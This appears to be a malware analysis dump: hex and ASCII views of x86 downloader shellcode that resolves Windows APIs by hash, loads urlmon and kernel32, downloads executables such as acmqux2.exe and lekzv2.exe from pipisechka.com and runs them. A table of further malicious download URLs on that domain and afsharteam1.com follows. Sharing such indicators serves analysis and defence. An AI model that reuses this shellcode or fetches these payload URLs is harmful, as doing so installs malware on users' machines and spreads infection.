8b 5d 08 80 fb 42 75 08  33 db 8a 18 8b c3 eb 17 
38 18 76 11 40 33 c9 84  db 74 0c 40 38 08 75 fb 
40 fe cb eb f2 33 c0 89  45 fc 8b 45 fc 5b c9 c3 
32 02 68 74 74 70 3a 2f  2f 70 69 70 69 73 65 63 
68 6b 61 2e 63 6f 6d 2f  73 6c 65 65 70 2f 61 63 
6d 71 75 78 32 2e 65 78  65 00 68 74 74 70 3a 2f 
2f 70 69 70 69 73 65 63  68 6b 61 2e 63 6f 6d 2f 
73 6c 65 65 70 2f 63 6c  69 63 6b 2e 70 68 70 3f 
72 3d 00 00 
.............Vd.
0....@..p...@.^.
U...E.R3....2.@.
8.u...Z]...U..QQ
SVW`.].3..u....v
<.Nx...Q.R.Q$R.q
.N.u..q ...J.B`;
U.u.3..73..E....
.u.+.OQ.....;.at
....E..^......3.
..._............
E.a.E._^[..U..Q.
I...Ph.`...l...3
.RR.u....E..E...
U......E.P.E.u.E
.r.E.l.E.m.E.o.E
.n.E...E.d.E.l.E
.l.E.......Ph]..
...........t.j.j
..u..u.j.....u.@
..3...W3..L$..|$
...._..L$..9...t
.@.8.u.+..U....d
S.E.W3.P.E.k.E.e
.E.r.E.n.E.e.E.l
.E.3.E.2.E...E.d
.E.l.E.l.]......
PhhC..........E.
jDP.~....E.j.P.s
.......E.P.E.PSS
SSSS.u..E.D...S.
._...[..U..QQSVW
jB.r.....3...Y.E
.a.ex.E.e...~V.E
.PV.Q...YP......
.YYt9.F.P.;.....
.E.P.!.....YYt.W
.....Y.D8.sP.E..
.X.E.PW.t...YYFF
;.|._^[..U..QSf`
.2.....X8.t.@..@
.]...Bu.3.......
8.v.@3...t.@8.u.
@....3..E..E.[..
2.http://pipisec
hka.com/sleep/ac
mqux2.exe.http:/
/pipisechka.com/
sleep/click.php?
r=..
0a 0a 0a 0a 0a 0a 0a 0a  e9 eb 01 00 00 56 64 a1 
30 00 00 00 8b 40 0c 8b  70 1c ad 8b 40 08 5e c3 
55 8b ec 8b 45 08 52 33  d2 c1 c2 03 32 10 40 80 
38 00 75 f5 8b c2 5a 5d  c2 04 00 55 8b ec 51 51 
53 56 57 60 8b 5d 08 33  c0 8b 75 0c 8b fe 03 76 
3c 8b 4e 78 03 cf 8b 51  1c 52 8b 51 24 52 8b 71 
14 4e 89 75 fc 8b 71 20  03 f7 99 4a ad 42 60 3b 
55 fc 75 04 33 c0 eb 37  33 ff 03 45 0c 97 8b cf 
ae 75 fd 2b f9 4f 51 e8  94 ff ff ff 3b c3 61 74 
02 eb d9 8b 45 0c 92 5e  03 f2 d1 e0 03 c6 33 c9 
0f b7 08 5f c1 e1 02 03  ca 03 cf 8b 01 03 c2 89 
45 f8 61 8b 45 f8 5f 5e  5b c9 c3 55 8b ec 51 e8 
49 ff ff ff 50 68 e8 60  bf 04 e8 6c ff ff ff 33 
d2 52 52 ff 75 08 ff d0  89 45 fc 8b 45 fc c9 c3 
55 8b ec 83 ec 0c 8d 45  f4 50 c6 45 f4 75 c6 45 
f5 72 c6 45 f6 6c c6 45  f7 6d c6 45 f8 6f c6 45 
f9 6e c6 45 fa 2e c6 45  fb 64 c6 45 fc 6c c6 45 
fd 6c c6 45 fe 00 e8 a0  ff ff ff 50 68 5d 8a 11 
16 e8 15 ff ff ff 83 c4  0c 85 c0 74 15 6a 00 6a 
00 ff 75 0c ff 75 08 6a  00 ff d0 85 c0 75 03 40 
c9 c3 33 c0 c9 c3 57 33  c0 8b 4c 24 0c 8b 7c 24 
08 fc f3 aa 5f c3 8b 4c  24 04 80 39 00 8b c1 74 
06 40 80 38 00 75 fa 2b  c1 c3 55 8b ec 83 ec 64 
53 8d 45 f0 57 33 db 50  c6 45 f0 6b c6 45 f1 65 
c6 45 f2 72 c6 45 f3 6e  c6 45 f4 65 c6 45 f5 6c 
c6 45 f6 33 c6 45 f7 32  c6 45 f8 2e c6 45 f9 64 
c6 45 fa 6c c6 45 fb 6c  88 5d fc e8 0b ff ff ff 
50 68 68 43 f9 8e e8 80  fe ff ff 8b f8 8d 45 9c 
6a 44 50 e8 7e ff ff ff  8d 45 e0 6a 10 50 e8 73 
ff ff ff 83 c4 1c 8d 45  e0 50 8d 45 9c 50 53 53 
53 53 53 53 ff 75 08 c7  45 9c 44 00 00 00 53 ff 
d7 5f 0f b6 c0 5b c9 c3  55 8b ec 51 51 53 56 57 
6a 42 e8 72 00 00 00 8b  d8 33 f6 85 db 59 c7 45 
f8 61 2e 65 78 c7 45 fc  65 00 00 00 7e 56 8d 45 
f8 50 56 e8 51 00 00 00  59 50 e8 b1 fe ff ff 85 
c0 59 59 74 39 8d 46 01  50 e8 3b 00 00 00 8b f8 
8d 45 f8 50 e8 21 ff ff  ff 85 c0 59 59 74 0c 57 
e8 01 ff ff ff 59 c6 44  38 ff 73 50 8d 45 f8 fe 
00 58 8d 45 f8 50 57 e8  74 fe ff ff 59 59 46 46 
3b f3 7c aa 5f 5e 5b c9  c3 55 8b ec 51 53 66 60 
b1 32 e8 00 00 00 00 58  38 08 74 03 40 eb f9 40 
8b 5d 08 80 fb 42 75 08  33 db 8a 18 8b c3 eb 17 
38 18 76 11 40 33 c9 84  db 74 0c 40 38 08 75 fb 
40 fe cb eb f2 33 c0 89  45 fc 8b 45 fc 5b c9 c3 
32 02 68 74 74 70 3a 2f  2f 70 69 70 69 73 65 63 
68 6b 61 2e 63 6f 6d 2f  73 6c 65 65 70 2f 6c 65 
6b 7a 76 32 2e 65 78 65  00 68 74 74 70 3a 2f 2f 
70 69 70 69 73 65 63 68  6b 61 2e 63 6f 6d 2f 73 
6c 65 65 70 2f 63 6c 69  63 6b 2e 70 68 70 3f 72 
3d 00 
.............Vd.
0....@..p...@.^.
U...E.R3....2.@.
8.u...Z]...U..QQ
SVW`.].3..u....v
<.Nx...Q.R.Q$R.q
.N.u..q ...J.B`;
U.u.3..73..E....
.u.+.OQ.....;.at
....E..^......3.
..._............
E.a.E._^[..U..Q.
I...Ph.`...l...3
.RR.u....E..E...
U......E.P.E.u.E
.r.E.l.E.m.E.o.E
.n.E...E.d.E.l.E
.l.E.......Ph]..
...........t.j.j
..u..u.j.....u.@
..3...W3..L$..|$
...._..L$..9...t
.@.8.u.+..U....d
S.E.W3.P.E.k.E.e
.E.r.E.n.E.e.E.l
.E.3.E.2.E...E.d
.E.l.E.l.]......
PhhC..........E.
jDP.~....E.j.P.s
.......E.P.E.PSS
SSSS.u..E.D...S.
._...[..U..QQSVW
jB.r.....3...Y.E
.a.ex.E.e...~V.E
.PV.Q...YP......
.YYt9.F.P.;.....
.E.P.!.....YYt.W
.....Y.D8.sP.E..
.X.E.PW.t...YYFF
;.|._^[..U..QSf`
.2.....X8.t.@..@
.]...Bu.3.......
8.v.@3...t.@8.u.
@....3..E..E.[..
2.http://pipisec
hka.com/sleep/le
kzv2.exe.http://
pipisechka.com/s
leep/click.php?r
=.

Additional (potential) malware:

URLTypeHashAnalysis
http://afsharteam1.com/win/setup.exe N/A N/A
http://pipisechka.com/sleep/acmqux2.exe N/A N/A
http://pipisechka.com/sleep/acnty2.exe N/A N/A
http://pipisechka.com/sleep/cdkpsv7.exe N/A N/A
http://pipisechka.com/sleep/click.php?r= N/A N/A
http://pipisechka.com/sleep/fptv2.exe N/A N/A
http://pipisechka.com/sleep/ghimqs2.exe N/A N/A
http://pipisechka.com/sleep/gnbiz2.exe N/A N/A
http://pipisechka.com/sleep/lekzv2.exe N/A N/A
http://pipisechka.com/sleep/sdgsg5.exe N/A N/A